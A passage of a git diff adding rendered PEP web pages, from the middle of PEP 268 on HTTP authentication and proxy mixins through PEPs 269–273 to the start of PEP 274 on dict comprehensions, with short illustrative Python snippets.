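+creds.add('www.example.com', 80, '/private', 'user', 'secret')   # assumed API
+conn = AuthHTTPConnection('www.example.com', credentials=creds)  # assumed keyword
+conn.putrequest('GET', '/private/report')
+conn.endheaders()
+response = conn.getresponse()  # 401/407 handled by the registered authenticators
+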

+

The mixin overrides the getresponse() method to detect 401 +(Unauthorized) and 407 (Proxy Authentication Required) +responses. When this is found, the response object, the connection, +and the credentials are passed to the authenticator corresponding with +the authentication scheme specified in the response (multiple +authenticators are tried in decreasing order of security if multiple +schemes are in the response). Each authenticator can examine the +response headers and decide whether and how to resend the request with +the correct authentication headers. If no authenticator can +successfully handle the authentication, then an exception is raised.

+

Resending a request, with the appropriate credentials, is one of the +more difficult portions of the authentication system. The difficulty +arises in recording what was sent originally: the request line, the +headers, and the body. By overriding putrequest, putheader, and +endheaders, we can capture all but the body. Once the endheaders +method is called, then we capture all calls to send() (until the next +putrequest method call) to hold the body content. The mixin will have +a configurable limit for the amount of data to hold in this fashion +(e.g. only hold up to 100k of body content). Assuming that the entire +body has been stored, then we can resend the request with the +appropriate authentication information.

+

If the body is too large to be stored, then the getresponse() +simply returns the response object, indicating the 401 or 407 +error. Since the authentication information has been computed and +cached (into the Credentials object; see below), the caller can simply +regenerate the request. The mixin will attach the appropriate +credentials.

+

A “protection space” (see RFC 2617, section 1.2) is defined as a tuple +of the host, port, and authentication realm. When a request is +initially sent to an HTTP server, we do not know the authentication +realm (the realm is only returned when authentication fails). However, +we do have the path from the URL, and that can be useful in +determining the credentials to send to the server. The Basic +authentication scheme is typically set up hierarchically: the +credentials for /path can be tried for /path/subpath. The +Digest authentication scheme has explicit support for the hierarchical +setup. The httpx.Credentials object will store credentials for +multiple protection spaces, and can be looked up in two different +ways:

+
    +
  1. looked up using (host, port, path) – this lookup scheme is +used when generating a request for a path where we don’t know the +authentication realm.
  2. looked up using (host, port, realm) – this mechanism is used +during the authentication process when the server has specified that +the Request-URI resides within a specific realm.
+

The HandleAuthentication mixin will override putrequest() to +automatically insert credentials, if available. The URL from the +putrequest is used to determine the appropriate authentication +information to use.

+

It is also important to note that two sets of credentials are used, +and stored by the mixin. One set for any proxy that may be used, and +one used for the target origin server. Since proxies do not have +paths, the protection spaces in the proxy credentials will always use +“/” for storing and looking up via a path.

+
+
+

Proxy Handling

+

The httpx module will provide a mixin for using a proxy to perform +HTTP(S) operations. This mixin (httpx.UseProxy) can be combined +with the HTTPConnection and the HTTPSConnection classes (the +mixin may possibly work with the HTTP and HTTPS compatibility classes, +but that is not a requirement).

+

The mixin will record the (host, port) of the proxy to use. XXX +will be overridden to use this host/port combination for connections +and to rewrite request URLs into the absoluteURIs referring to the +origin server (these URIs are passed to the proxy server).
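+
The rewriting amounts to turning the request path into the absoluteURI form of RFC 2616, roughly:
+
def absolute_uri(host, port, path):
+    # a request routed through a proxy must name the origin server explicitly
+    return 'http://%s:%d%s' % (host, port, path)
+
+absolute_uri('www.example.com', 80, '/index.html')
+# -> 'http://www.example.com:80/index.html'
+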

+

Proxy authentication is handled by the httpx.HandleAuthentication +class since a user may directly use HTTP(S)Connection to speak +with proxies.

+
+
+

WebDAV Features

+

The davlib module will provide a mixin for sending WebDAV requests +to a WebDAV-enabled server. This mixin (davlib.DAVClient) can be +combined with the HTTPConnection and the HTTPSConnection +classes (the mixin may possibly work with the HTTP and HTTPS +compatibility classes, but that is not a requirement).

+

The mixin provides methods to perform the various HTTP methods defined +by HTTP in RFC 2616, and by WebDAV in RFC 2518.

+

A custom response object is used to decode 207 (Multi-Status) +responses. The response object will use the standard library’s xml +package to parse the multistatus XML information, producing a simple +structure of objects to hold the multistatus data. Multiple parsing +schemes will be tried/used, in order of decreasing speed.

+
+
+
+

Reference Implementation

+

The actual (future/final) implementation is being developed in the +/nondist/sandbox/Lib directory, until it is accepted and moved +into the main Lib directory.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0268.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0269/index.html new file mode 100644 index 00000000000..7a6094f4988 --- /dev/null +++ b/pep-0269/index.html @@ -0,0 +1,328 @@ + + PEP 269 – Pgen Module for Python | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 269 – Pgen Module for Python

+
+
Author:
+
Jonathan Riehl <jriehl at spaceship.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Much like the parser module exposes the Python parser, this PEP +proposes that the parser generator used to create the Python +parser, pgen, be exposed as a module in Python.

+
+
+

Rationale

+

Through the course of Pythonic history, there have been numerous +discussions about the creation of a Python compiler [1]. These +have resulted in several implementations of Python parsers, most +notably the parser module currently provided in the Python +standard library [2] and Jeremy Hylton’s compiler module [3]. +However, while multiple language changes have been proposed +[4] [5], experimentation with the Python syntax has lacked the +benefit of a Python binding to the actual parser generator used to +build Python.

+

By providing a Python wrapper analogous to Fred Drake Jr.’s parser +wrapper, but targeted at the pgen library, the following +assertions are made:

+
    +
  1. Reference implementations of syntax changes will be easier to +develop. Currently, a reference implementation of a syntax +change would require the developer to use the pgen tool from +the command line. The resulting parser data structure would +then either have to be reworked to interface with a custom +CPython implementation, or wrapped as a C extension module.
  2. Reference implementations of syntax changes will be easier to +distribute. Since the parser generator will be available in +Python, it should follow that the resulting parser will be +accessible from Python. Therefore, reference implementations +should be available as pure Python code, versus using custom +versions of the existing CPython distribution, or as compilable +extension modules.
  3. Reference implementations of syntax changes will be easier to +discuss with a larger audience. This somewhat falls out of the +second assertion, since the community of Python users is most +likely larger than the community of CPython developers.
  4. Development of small languages in Python will be further +enhanced, since the additional module will be a fully +functional LL(1) parser generator.
+
+
+

Specification

+

The proposed module will be called pgen. The pgen module will +contain the following functions:

+
+

parseGrammarFile (fileName) -> AST

+

The parseGrammarFile() function will read the file pointed to +by fileName and create an AST object. The AST nodes will +contain the numeric nonterminal values of the parser +generator meta-grammar. The output AST will be an instance of +the AST extension class as provided by the parser module. +Syntax errors in the input file will cause the SyntaxError +exception to be raised.

+
+
+

parseGrammarString (text) -> AST

+

The parseGrammarString() function will follow the semantics of +the parseGrammarFile(), but accept the grammar text as a +string for input, as opposed to the file name.

+
+
+

buildParser (grammarAst) -> DFA

+

The buildParser() function will accept an AST object for input +and return a DFA (deterministic finite automaton) data +structure. The DFA data structure will be a C extension +class, much like the AST structure is provided in the parser +module. If the input AST does not conform to the nonterminal +codes defined for the pgen meta-grammar, buildParser() will +throw a ValueError exception.

+
+
+

parseFile (fileName, dfa, start) -> AST

+

The parseFile() function will essentially be a wrapper for the +PyParser_ParseFile() C API function. The wrapper code will +accept the DFA C extension class, and the file name. An AST +instance that conforms to the lexical values in the token +module and the nonterminal values contained in the DFA will be +output.

+
+
+

parseString (text, dfa, start) -> AST

+

The parseString() function will operate in a similar fashion +to the parseFile() function, but accept the parse text as an +argument. Much like parseFile() will wrap the +PyParser_ParseFile() C API function, parseString() will wrap +the PyParser_ParseString() function.

+
+
+

symbolToStringMap (dfa) -> dict

+

The symbolToStringMap() function will accept a DFA instance +and return a dictionary object that maps from the DFA’s +numeric values for its nonterminals to the string names of the +nonterminals as found in the original grammar specification +for the DFA.

+
+
+

stringToSymbolMap (dfa) -> dict

+

The stringToSymbolMap() function will output a dictionary mapping +the nonterminal names of the input DFA to their corresponding +numeric values.

+

Extra credit will be awarded if the map generation functions and +parsing functions are also methods of the DFA extension class.
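+
Taken together, the proposed functions would support a workflow like the following sketch (the grammar file path and the numeric start symbol are illustrative values):
+
import pgen
+
+start = 257                                       # numeric start symbol (illustrative)
+ast = pgen.parseGrammarFile('Grammar/Grammar')    # meta-grammar AST
+dfa = pgen.buildParser(ast)                       # parser tables
+tree = pgen.parseString('x = 1\n', dfa, start)    # parse with the new grammar
+names = pgen.symbolToStringMap(dfa)               # nonterminal number -> name
+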

+
+
+
+

Implementation Plan

+

A cunning plan has been devised to accomplish this enhancement:

+
    +
  1. Rename the pgen functions to conform to the CPython naming +standards. This action may involve adding some header files to +the Include subdirectory.
  2. Move the pgen C modules in the Makefile.pre.in from unique pgen +elements to the Python C library.
  3. Make any needed changes to the parser module so the AST +extension class understands that there are AST types it may not +understand. Cursory examination of the AST extension class +shows that it keeps track of whether the tree is a suite or an +expression.
  4. Code an additional C module in the Modules directory. The C +extension module will implement the DFA extension class and the +functions outlined in the previous section.
  5. Add the new module to the build process. Black magic, indeed.
+
+
+

Limitations

+

Under this proposal, would-be designers of Python 3000 will still +be constrained to Python’s lexical conventions. The addition, +subtraction or modification of the Python lexer is outside the +scope of this PEP.

+
+
+

Reference Implementation

+

No reference implementation is currently provided. A patch +was provided at some point in +http://sourceforge.net/tracker/index.php?func=detail&aid=599331&group_id=5470&atid=305470 +but that patch is no longer maintained.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0269.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0270/index.html new file mode 100644 index 00000000000..1c2a9e9d41a --- /dev/null +++ b/pep-0270/index.html @@ -0,0 +1,197 @@ + + PEP 270 – uniq method for list objects | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 270 – uniq method for list objects

+
+
Author:
+
Jason Petrone <jp at demonseed.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
21-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Notice

+

This PEP is withdrawn by the author. He writes:

+
+
Removing duplicate elements from a list is a common task, but +there are only two reasons I can see for making it a built-in. +The first is if it could be done much faster, which isn’t the +case. The second is if it makes it significantly easier to +write code. The introduction of sets.py eliminates this +situation since creating a sequence without duplicates is just +a matter of choosing a different data structure: a set instead +of a list.
+

As described in PEP 218, sets are being added to the standard +library for Python 2.3.

+
+
+

Abstract

+

This PEP proposes adding a method for removing duplicate elements to +the list object.

+
+
+

Rationale

+

Removing duplicates from a list is a common task. I think it is +useful and general enough to belong as a method in list objects. +It also has potential for faster execution when implemented in C, +especially if optimization using hashing or sorted cannot be used.

+

On comp.lang.python there are many, many posts [1] asking about +the best way to do this task. It’s a little tricky to implement +optimally and it would be nice to save people the trouble of +figuring it out themselves.

+
+
+

Considerations

+

Tim Peters suggests trying to use a hash table, then trying to +sort, and finally falling back on brute force [2]. Should uniq +maintain list order at the expense of speed?
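+
That three-stage strategy translates into a sketch along these lines (only the brute-force branch preserves list order; this is an illustration, not the proposed C implementation):
+
def uniq(alist):
+    try:                          # 1) hashable elements: use a dict
+        d = {}
+        for item in alist:
+            d[item] = None
+        return list(d.keys())
+    except TypeError:
+        pass
+    try:                          # 2) comparable elements: sort, then scan
+        t = list(alist)
+        t.sort()
+    except TypeError:
+        pass
+    else:
+        result = []
+        for item in t:
+            if not result or item != result[-1]:
+                result.append(item)
+        return result
+    result = []                   # 3) brute force: O(n**2), fully general
+    for item in alist:
+        if item not in result:
+            result.append(item)
+    return result
+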

+

Is it spelled ‘uniq’ or ‘unique’?

+
+
+

Reference Implementation

+

I’ve written the brute force version. It’s about 20 lines of code +in listobject.c. Adding support for hash table and sorted +duplicate removal would only take another hour or so.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0270.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0271/index.html new file mode 100644 index 00000000000..eb8a320f86f --- /dev/null +++ b/pep-0271/index.html @@ -0,0 +1,187 @@ + + PEP 271 – Prefixing sys.path by command line option | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 271 – Prefixing sys.path by command line option

+
+
Author:
+
Frédéric B. Giacometti <fred at arakne.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

At present, setting the PYTHONPATH environment variable is the +only method for defining additional Python module search +directories.

+

This PEP introduces the ‘-P’ valued option to the python command +as an alternative to PYTHONPATH.

+
+
+

Rationale

+

On Unix:

+
python -P $SOMEVALUE
+
+
+

will be equivalent to:

+
env PYTHONPATH=$SOMEVALUE python
+
+
+

On Windows 2K:

+
python -P %SOMEVALUE%
+
+
+

will (almost) be equivalent to:

+
set __PYTHONPATH=%PYTHONPATH% && set PYTHONPATH=%SOMEVALUE%\
+   && python && set PYTHONPATH=%__PYTHONPATH%
+
+
+
+
+

Other Information

+

This option is equivalent to the ‘java -classpath’ option.

+
+
+

When to use this option

+

This option is intended to ease and make more robust the use of +Python in test or build scripts, for instance.

+
+
+

Reference Implementation

+

A patch implementing this is available from SourceForge:

+
http://sourceforge.net/tracker/download.php?group_id=5470&atid=305470&file_id=6916&aid=429614
+
+
+

with the patch discussion at:

+
http://sourceforge.net/tracker/?func=detail&atid=305470&aid=429614&group_id=5470
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0271.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0272/index.html new file mode 100644 index 00000000000..235485952a4 --- /dev/null +++ b/pep-0272/index.html @@ -0,0 +1,357 @@ + + PEP 272 – API for Block Encryption Algorithms v1.0 | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 272 – API for Block Encryption Algorithms v1.0

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
18-Sep-2001
+
Post-History:
+
17-Apr-2002, 29-May-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document specifies a standard API for secret-key block +encryption algorithms such as DES or Rijndael, making it easier to +switch between different algorithms and implementations.

+
+
+

Introduction

+

Encryption algorithms transform their input data (called +plaintext) in some way that is dependent on a variable key, +producing ciphertext. The transformation can easily be reversed +if and only if one knows the key. The key is a sequence of bits +chosen from some very large space of possible keys. There are two +classes of encryption algorithms: block ciphers and stream ciphers.

+

Block ciphers encrypt multibyte inputs of a fixed size (frequently +8 or 16 bytes long), and can be operated in various feedback +modes. The feedback modes supported in this specification are:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Number  Constant  Description
1       MODE_ECB  Electronic Code Book
2       MODE_CBC  Cipher Block Chaining
3       MODE_CFB  Cipher Feedback
5       MODE_OFB  Output Feedback
6       MODE_CTR  Counter
+

These modes are to be implemented as described in NIST publication +SP 800-38A [1]. Descriptions of the first three feedback modes can +also be found in Bruce Schneier’s book Applied Cryptography [2].

+

(The numeric value 4 is reserved for MODE_PGP, a variant of CFB +described in RFC 2440: “OpenPGP Message Format”. This mode +isn’t considered important enough to make it worth requiring it +for all block encryption ciphers, though supporting it is a nice +extra feature.)

+

In a strict formal sense, stream ciphers encrypt data bit-by-bit; +practically, stream ciphers work on a character-by-character +basis. This PEP only aims at specifying an interface for block +ciphers, though stream ciphers can support the interface described +here by fixing ‘block_size’ to 1. Feedback modes also don’t make +sense for stream ciphers, so the only reasonable feedback mode +would be ECB mode.

+
+
+

Specification

+

Encryption modules can add additional functions, methods, and +attributes beyond those described in this PEP, but all of the +features described in this PEP must be present for a module to +claim compliance with it.

+

Secret-key encryption modules should define one function:

+
new(key, mode, [IV], **kwargs)
+
+
+

Returns a ciphering object, using the secret key contained in the +string ‘key’, and using the feedback mode ‘mode’, which must be +one of the constants from the table above.

+

If ‘mode’ is MODE_CBC or MODE_CFB, ‘IV’ must be provided and must +be a string of the same length as the block size. Not providing a +value of ‘IV’ will result in a ValueError exception being raised.

+

Depending on the algorithm, a module may support additional +keyword arguments to this function. Some keyword arguments are +specified by this PEP, and modules are free to add additional +keyword arguments. If a value isn’t provided for a given keyword, +a secure default value should be used. For example, if an +algorithm has a selectable number of rounds between 1 and 16, and +1-round encryption is insecure and 8-round encryption is believed +secure, the default value for ‘rounds’ should be 8 or more. +(Module implementors can choose a very slow but secure value, too, +such as 16 in this example. This decision is left up to the +implementor.)

+

The following table lists keyword arguments defined by this PEP:

+ + + + + + + + + + + + + + + + + +
Keyword       Meaning
counter       Callable object that returns counter blocks (see below; CTR mode only)
rounds        Number of rounds of encryption to use
segment_size  Size of data and ciphertext segments, measured in bits (see below; CFB mode only)
+

The Counter feedback mode requires a sequence of input blocks, +called counters, that are used to produce the output. When ‘mode’ +is MODE_CTR, the ‘counter’ keyword argument must be provided, and +its value must be a callable object, such as a function or method. +Successive calls to this callable object must return a sequence of +strings that are of the length ‘block_size’ and that never +repeats. (Appendix B of the NIST publication gives a way to +generate such a sequence, but that’s beyond the scope of this +PEP.)
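+
A counter callable satisfying these rules might look like the following sketch (big-endian encoding is an arbitrary choice; any scheme that never repeats within the counter space works):
+
import struct
+
+def make_counter(block_size=8):
+    count = [0]
+    def counter():
+        # returns successive big-endian counter blocks of block_size
+        # bytes; does not repeat until 2**(8*block_size) calls
+        count[0] += 1
+        n = count[0]
+        block = b''
+        for i in range(block_size):
+            block = struct.pack('B', n & 0xFF) + block
+            n >>= 8
+        return block
+    return counter
+
In terms of the hypothetical DES module from the example below, such a callable would be passed as DES.new(key, DES.MODE_CTR, counter=make_counter(8)).
+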

+

The CFB mode operates on segments of the plaintext and ciphertext +that are ‘segment_size’ bits long. Therefore, when using this +mode, the input and output strings must be a multiple of +‘segment_size’ bits in length. ‘segment_size’ must be an integer +between 1 and block_size*8, inclusive. (The factor of 8 comes +from ‘block_size’ being measured in bytes and not in bits). The +default value for this parameter should be block_size*8. +Implementors are allowed to constrain ‘segment_size’ to be a +multiple of 8 for simplicity, but they’re encouraged to support +arbitrary values for generality.

+

Secret-key encryption modules should define two variables:

+
    +
  • block_size

    An integer value; the size of the blocks encrypted by this +module, measured in bytes. For all feedback modes, the length +of strings passed to the encrypt() and decrypt() must be a +multiple of the block size.

    +
  • key_size

    An integer value; the size of the keys required by this +module, measured in bytes. If key_size is None, then the +algorithm accepts variable-length keys. This may mean the +module accepts keys of any random length, or that there are a +few different possible lengths, e.g. 16, 24, or 32 bytes. You +cannot pass a key of length 0 (that is, the null string ‘’) as +a variable-length key.

    +
+

Cipher objects should have two attributes:

+
    +
  • block_size

    An integer value equal to the size of the blocks encrypted by +this object. For algorithms with a variable block size, this +value is equal to the block size selected for this object.

    +
  • IV

    Contains the initial value which will be used to start a +cipher feedback mode; it will always be a string exactly one +block in length. After encrypting or decrypting a string, +this value is updated to reflect the modified feedback text. +It is read-only, and cannot be assigned a new value.

    +
+

Cipher objects require the following methods:

+
    +
  • decrypt(string)

    Decrypts ‘string’, using the key-dependent data in the object +and with the appropriate feedback mode. The string’s length +must be an exact multiple of the algorithm’s block size or, in +CFB mode, of the segment size. Returns a string containing +the plaintext.

    +
  • encrypt(string)

    Encrypts a non-empty string, using the key-dependent data in +the object, and with the appropriate feedback mode. The +string’s length must be an exact multiple of the algorithm’s +block size or, in CFB mode, of the segment size. Returns a +string containing the ciphertext.

    +
+

Here’s an example, using a module named ‘DES’:

+
>>> import DES
+>>> obj = DES.new('abcdefgh', DES.MODE_ECB)
+>>> plaintext = "Guido van Rossum is a space alien."
+>>> len(plaintext)
+34
+>>> obj.encrypt(plaintext)
+Traceback (innermost last):
+  File "<stdin>", line 1, in ?
+ValueError: Strings for DES must be a multiple of 8 in length
+>>> ciphertext = obj.encrypt(plaintext+'XXXXXX')   # Add padding
+>>> ciphertext
+'\021,\343Nq\214DY\337T\342pA\372\255\311s\210\363,\300j\330\250\312\347\342I\3215w\03561\303dgb/\006'
+>>> obj.decrypt(ciphertext)
+'Guido van Rossum is a space alien.XXXXXX'
+
+
+
+
+

References

+ +
+
+

Changes

+

2002-04: Removed references to stream ciphers; retitled PEP; +prefixed feedback mode constants with MODE_; removed PGP feedback +mode; added CTR and OFB feedback modes; clarified where numbers +are measured in bytes and where in bits.

+

2002-09: Clarified the discussion of key length by using +“variable-length keys” instead of “arbitrary-length”.

+
+
+

Acknowledgements

+

Thanks to the readers of the python-crypto list for their comments on +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0272.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0273/index.html new file mode 100644 index 00000000000..cdbceadded2 --- /dev/null +++ b/pep-0273/index.html @@ -0,0 +1,361 @@ + + PEP 273 – Import Modules from Zip Archives | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 273 – Import Modules from Zip Archives

+
+
Author:
+
James C. Ahlstrom <jim at interet.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Oct-2001
+
Python-Version:
+
2.3
+
Post-History:
+
26-Oct-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds the ability to import Python modules +*.py, *.py[co] and packages from zip archives. The +same code is used to speed up normal directory imports +provided os.listdir is available.

+
+
+

Note

+

Zip imports were added to Python 2.3, but the final implementation +uses an approach different from the one described in this PEP. +The 2.3 implementation is SourceForge patch #652586 [1], which adds +new import hooks described in PEP 302.

+

The rest of this PEP is therefore only of historical interest.

+
+
+

Specification

+

Currently, sys.path is a list of directory names as strings. If +this PEP is implemented, an item of sys.path can be a string +naming a zip file archive. The zip archive can contain a +subdirectory structure to support package imports. The zip +archive satisfies imports exactly as a subdirectory would.

+

The implementation is in C code in the Python core and works on +all supported Python platforms.

+

Any files may be present in the zip archive, but only files +*.py and *.py[co] are available for import. Zip import of +dynamic modules (*.pyd, *.so) is disallowed.

+

Just as sys.path currently has default directory names, a default +zip archive name is added too. Otherwise there is no way to +import all Python library files from an archive.

+
+
+

Subdirectory Equivalence

+

The zip archive must be treated exactly as a subdirectory tree so +we can support package imports based on current and future rules. +All zip data is taken from the Central Directory, the data must be +correct, and brain dead zip files are not accommodated.

+

Suppose sys.path contains “/A/B/SubDir” and “/C/D/E/Archive.zip”, +and we are trying to import modfoo from the Q package. Then +import.c will generate a list of paths and extensions and will +look for the file. The list of generated paths does not change +for zip imports. Suppose import.c generates the path +“/A/B/SubDir/Q/R/modfoo.pyc”. Then it will also generate the path +“/C/D/E/Archive.zip/Q/R/modfoo.pyc”. Finding the SubDir path is +exactly equivalent to finding “Q/R/modfoo.pyc” in the archive.

+

Suppose you zip up /A/B/SubDir/* and all its subdirectories. Then +your zip file will satisfy imports just as your subdirectory did.

+

Well, not quite. You can’t satisfy dynamic modules from a zip +file. Dynamic modules have extensions like .dll, .pyd, and .so. +They are operating system dependent, and probably can’t be loaded +except from a file. It might be possible to extract the dynamic +module from the zip file, write it to a plain file and load it. +But that would mean creating temporary files, and dealing with all +the dynload_*.c, and that’s probably not a good idea.

+

When trying to import *.pyc, if it is not available then +*.pyo will be used instead. And vice versa when looking for *.pyo. +If neither *.pyc nor *.pyo is available, or if the magic numbers +are invalid, then *.py will be compiled and used to satisfy the +import, but the compiled file will not be saved. Python would +normally write it to the same directory as *.py, but surely we +don’t want to write to the zip file. We could write to the +directory of the zip archive, but that would clutter it up, not +good if it is /usr/bin for example.

+

Failing to write the compiled files will make zip imports very slow, +and the user will probably not figure out what is wrong. So it +is best to put *.pyc and *.pyo in the archive with the *.py.

+
+
+

Efficiency

+

The only way to find files in a zip archive is linear search. So +for each zip file in sys.path, we search for its names once, and +put the names plus other relevant data into a static Python +dictionary. The key is the archive name from sys.path joined with +the file name (including any subdirectories) within the archive. +This is exactly the name generated by import.c, and makes lookup +easy.
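+
The idea can be illustrated with the standard zipfile module (a sketch of how the dictionary is built, not the actual C implementation):
+
import zipfile
+
+def build_zip_index(archive_path):
+    # key: archive name joined with the name inside the archive --
+    # exactly the path import.c would generate, so lookup is one probe
+    index = {}
+    for info in zipfile.ZipFile(archive_path).infolist():
+        index[archive_path + '/' + info.filename] = info
+    return index
+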

+

This same mechanism is used to speed up directory (non-zip) imports. +See below.

+
+
+

zlib

+

Compressed zip archives require zlib for decompression. Prior to +any other imports, we attempt an import of zlib. Import of +compressed files will fail with a message “missing zlib” unless +zlib is available.

+
+
+

Booting

+

Python imports site.py itself, and this imports os, nt, ntpath, +stat, and UserDict. It also imports sitecustomize.py which may +import more modules. Zip imports must be available before site.py +is imported.

+

Just as there are default directories in sys.path, there must be +one or more default zip archives too.

+

The problem is what the name should be. The name should be linked +with the Python version, so the Python executable can correctly +find its corresponding libraries even when there are multiple +Python versions on the same machine.

+

We add one name to sys.path. On Unix, the directory is +sys.prefix + "/lib", and the file name is +"python%s%s.zip" % (sys.version[0], sys.version[2]). +So for Python 2.2 and prefix /usr/local, the path +/usr/local/lib/python2.2/ is already on sys.path, and +/usr/local/lib/python22.zip would be added. +On Windows, the file is the full path to python22.dll, with +“dll” replaced by “zip”. The zip archive name is always inserted +as the second item in sys.path. The first is the directory of the +main.py (thanks Tim).
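+
For example, the default archive path described above can be computed directly from sys (shown for Python 2.2 on Unix):
+
import sys
+
+zip_name = "python%s%s.zip" % (sys.version[0], sys.version[2])
+print sys.prefix + "/lib/" + zip_name   # e.g. /usr/local/lib/python22.zip
+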

+
+
+

Directory Imports

+

The static Python dictionary used to speed up zip imports can be +used to speed up normal directory imports too. For each item in +sys.path that is not a zip archive, we call os.listdir, and add +the directory contents to the dictionary. Then instead of calling +fopen() in a double loop, we just check the dictionary. This +greatly speeds up imports. If os.listdir doesn’t exist, the +dictionary is not used.

+
+
+

Benchmarks

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Case  Original 2.2a3     Using os.listdir   Zip Uncomp   Zip Compr
1     3.2 2.5 3.2->1.02  2.3 2.5 2.3->0.87  1.66->0.93   1.5->1.07
2     2.8 3.9 3.0->1.32  Same as Case 1.
3     5.7 5.7 5.7->5.7   2.1 2.1 2.1->1.8   1.25->0.99   1.19->1.13
4     9.4 9.4 9.3->9.35  Same as Case 3.
+

Case 1: Local drive C:, sys.path has its default value. +Case 2: Local drive C:, directory with files is at the end of sys.path. +Case 3: Network drive, sys.path has its default value. +Case 4: Network drive, directory with files is at the end of sys.path.

+

Benchmarks were performed on a Pentium 4 clone, 1.4 GHz, 256 Meg. +The machine was running Windows 2000 with a Linux/Samba network server. +Times are in seconds, and are the time to import about 100 Lib modules. +Case 2 and 4 have the “correct” directory moved to the end of sys.path. +“Uncomp” means uncompressed zip archive, “Compr” means compressed.

+

Initial times are after a re-boot of the system; the time after +“->” is the time after repeated runs. Times to import from C: +after a re-boot are rather highly variable for the “Original” case, +but are more realistic.

+
+
+

Custom Imports

+

The logic demonstrates the ability to import using default searching +until a needed Python module (in this case, os) becomes available. +This can be used to bootstrap custom importers. For example, if +“importer()” in __init__.py exists, then it could be used for imports. +The “importer()” can freely import os and other modules, and these +will be satisfied from the default mechanism. This PEP does not +define any custom importers, and this note is for information only.

+
+
+

Implementation

+

A C implementation is available as SourceForge patch 492105. +Superseded by patch 652586 and current CVS. [2]

+

A newer version (updated for recent CVS by Paul Moore) is 645650. +Superseded by patch 652586 and current CVS. [3]

+

A competing implementation by Just van Rossum is 652586, which is +the basis for the final implementation of PEP 302. PEP 273 has +been implemented using PEP 302’s import hooks. [1]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0273.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0274/index.html new file mode 100644 index 00000000000..ccb9d4b5e26 --- /dev/null +++ b/pep-0274/index.html @@ -0,0 +1,245 @@ + + PEP 274 – Dict Comprehensions | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 274 – Dict Comprehensions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2001
+
Python-Version:
+
2.7, 3.0
+
Post-History:
+
29-Oct-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 202 introduces a syntactical extension to Python called the +“list comprehension”. This PEP proposes a similar syntactical +extension called the “dictionary comprehension” or “dict +comprehension” for short. You can use dict comprehensions in ways +very similar to list comprehensions, except that they produce +Python dictionary objects instead of list objects.

+
+
+

Resolution

+

This PEP was originally written for inclusion in Python 2.3. It +was withdrawn after observation that substantially all of its +benefits were subsumed by generator expressions coupled with the +dict() constructor.

+

However, Python 2.7 and 3.0 introduce this exact feature, as well +as the closely related set comprehensions. On 2012-04-09, the PEP +was changed to reflect this reality by updating its Status to +Accepted, and updating the Python-Version field. The Open +Questions section was also removed since these have been long +resolved by the current implementation.

+
+
+

Proposed Solution

+

Dict comprehensions are just like list comprehensions, except that +you group the expression using curly braces instead of square +brackets. Also, the left part before the for keyword expresses +both a key and a value, separated by a colon. The notation is +specifically designed to remind you of list comprehensions as +applied to dictionaries.

+
+
+

Rationale

+

There are times when you have some data arranged as a sequence of +length-2 sequences, and you want to turn that into a dictionary. +In Python 2.2, the dict() constructor accepts an argument that is +a sequence of length-2 sequences, used as (key, value) pairs to +initialize a new dictionary object.

+

However, the act of turning some data into a sequence of length-2 +sequences can be inconvenient or inefficient from a memory or +performance standpoint. Also, for some common operations, such as +turning a list of things into a set of things for quick duplicate +removal or set inclusion tests, a better syntax can help code +clarity.

+

As with list comprehensions, an explicit for loop can always be +used (and in fact was the only way to do it in earlier versions of +Python). But as with list comprehensions, dict comprehensions can +provide a more syntactically succinct idiom than the traditional +for loop.

+
+
+

Semantics

+

The semantics of dict comprehensions can actually be demonstrated +in stock Python 2.2, by passing a list comprehension to the +built-in dictionary constructor:

+
>>> dict([(i, chr(65+i)) for i in range(4)])
+
+
+

is semantically equivalent to:

+
>>> {i : chr(65+i) for i in range(4)}
+
+
+

